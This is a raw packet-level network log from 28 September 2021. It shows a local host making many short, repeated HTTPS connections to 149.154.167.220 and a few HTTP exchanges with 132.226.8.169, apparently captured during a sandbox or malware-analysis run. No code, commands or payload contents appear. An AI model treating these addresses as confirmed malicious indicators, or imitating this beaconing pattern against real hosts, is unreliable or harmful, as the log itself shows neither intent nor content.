Sep 28, 2021 07:59:04.070403099 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.070410967 CEST	443	49960	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.187436104 CEST	443	49960	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.187541962 CEST	443	49960	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.188158989 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.233366966 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.240052938 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.240094900 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.246886015 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.246992111 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.247004032 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.333463907 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.379111052 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.435704947 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.435731888 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.435856104 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.435867071 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.688182116 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.688441038 CEST	443	49962	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.691971064 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.692030907 CEST	49962	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.692050934 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.692111969 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.694890022 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.694938898 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.694952011 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.798918962 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.803497076 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.803556919 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.803668022 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.803687096 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.921936989 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.922038078 CEST	443	49964	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.923938036 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.923974991 CEST	49964	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.926826954 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.926896095 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.927007914 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.927865982 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.927887917 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.016791105 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.025687933 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.025727034 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.025907993 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.025918961 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.127281904 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.127377033 CEST	443	49965	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.127746105 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.128375053 CEST	49965	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.136965036 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.137013912 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.137134075 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.137940884 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.137962103 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.205758095 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.211431980 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.211464882 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.214634895 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.214658976 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.319351912 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.319447994 CEST	443	49967	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.319591999 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.814696074 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.814769030 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.815221071 CEST	49967	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.815319061 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.815905094 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.815936089 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.945035934 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.948410034 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.948442936 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:05.948544979 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:05.948556900 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.086163044 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.086246967 CEST	443	49968	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.086411953 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.087647915 CEST	49968	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.088962078 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.089010000 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.089083910 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.089566946 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.089592934 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.149947882 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.153626919 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.153667927 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.153846979 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.153860092 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.303694010 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.303775072 CEST	443	49970	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.303839922 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.304971933 CEST	49970	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.310138941 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.310197115 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.310400009 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.311233997 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.311264038 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.388890982 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.395437956 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.395467997 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.395600080 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.395612001 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.504965067 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.505047083 CEST	443	49972	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.505105972 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.505846977 CEST	49972	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.507292986 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.507347107 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.507477999 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.508059025 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.508097887 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.604317904 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.662956953 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.665237904 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.665266991 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.667073011 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:06.667093992 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.841526031 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.841622114 CEST	443	49974	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:06.841756105 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.447547913 CEST	49974	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.449841022 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.449923992 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.450064898 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.450773001 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.450822115 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.517999887 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.521707058 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.521778107 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.521876097 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.521887064 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.667071104 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.668662071 CEST	443	49975	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.668824911 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.669473886 CEST	49975	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.671535015 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.671582937 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.674155951 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.674185991 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.674194098 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.748420000 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.786284924 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.786350012 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.788595915 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.788628101 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.946928978 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.947025061 CEST	443	49977	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.947154999 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.948268890 CEST	49977	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.950570107 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.950629950 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:07.950748920 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.951600075 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:07.951628923 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.019433975 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.030368090 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.030414104 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.034158945 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.034194946 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.130640030 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.130717993 CEST	443	49978	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.130789042 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.131782055 CEST	49978	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.133724928 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.133774996 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.133919001 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.134440899 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.134454012 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.190015078 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.193830967 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.193866014 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.193983078 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.193989992 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.301218987 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.301294088 CEST	443	49979	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.301357031 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.302393913 CEST	49979	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.304177999 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.304229975 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.304336071 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.304994106 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.305010080 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.361254930 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.365334988 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.365382910 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.365487099 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.365498066 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.487624884 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.487701893 CEST	443	49980	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.487782001 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.489003897 CEST	49980	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.491014957 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.491064072 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.491163969 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.491668940 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.491683960 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.548924923 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.554181099 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.554223061 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.554552078 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.554560900 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.662306070 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.662384033 CEST	443	49981	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.662487030 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.663332939 CEST	49981	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.665132999 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.665186882 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.665345907 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.666044950 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.666069031 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.722692966 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.726855993 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.726926088 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.727073908 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.727082968 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.835350990 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.835464954 CEST	443	49982	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.835681915 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.836822033 CEST	49982	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.838726997 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.838777065 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.838888884 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.839576960 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.839605093 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.907361031 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.912801981 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.912837029 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:08.919786930 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:08.919825077 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.021308899 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.023435116 CEST	443	49983	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.025863886 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.025929928 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.027272940 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.027338028 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.027354956 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.028825045 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.028868914 CEST	49983	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.086004972 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.096518993 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.096555948 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.096715927 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.096725941 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.186361074 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.186451912 CEST	443	49984	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.186870098 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.187988997 CEST	49984	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.191318989 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.191385984 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.191519022 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.192364931 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.192392111 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.256733894 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.260854959 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.260926008 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.261801004 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.262800932 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.386539936 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.386679888 CEST	443	49988	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.390697002 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.390736103 CEST	49988	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.390785933 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.390830994 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.394066095 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.394118071 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.394130945 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.465374947 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.469116926 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.469153881 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.469278097 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.469288111 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.590778112 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.590868950 CEST	443	49991	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.590997934 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.600472927 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.600543976 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.601882935 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.602843046 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.602871895 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.605046034 CEST	49991	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.659411907 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.665225029 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.665267944 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.665409088 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.665422916 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.769258022 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.773169041 CEST	443	49992	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.773432970 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.774099112 CEST	49992	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.776060104 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.776140928 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.776330948 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.776959896 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.777000904 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.841782093 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.852287054 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.852358103 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.852508068 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.852519035 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.958864927 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.959527969 CEST	443	49993	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.962686062 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.964824915 CEST	49993	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.965019941 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.965066910 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:09.965174913 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.966054916 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:09.966074944 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:10.862679005 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 28, 2021 07:59:10.864214897 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:59:11.048963070 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.055599928 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.055643082 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.055844069 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.055852890 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.190610886 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.190701962 CEST	443	49994	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.190964937 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.192614079 CEST	49994	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.194684029 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.194742918 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.194883108 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.198214054 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.198240995 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.269294977 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.274818897 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.274859905 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.274986029 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.274996042 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.415433884 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.415527105 CEST	443	49996	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:11.419054985 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.419109106 CEST	49996	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:11.420084000 CEST	49997	443	192.168.2.4	149.154.167.220
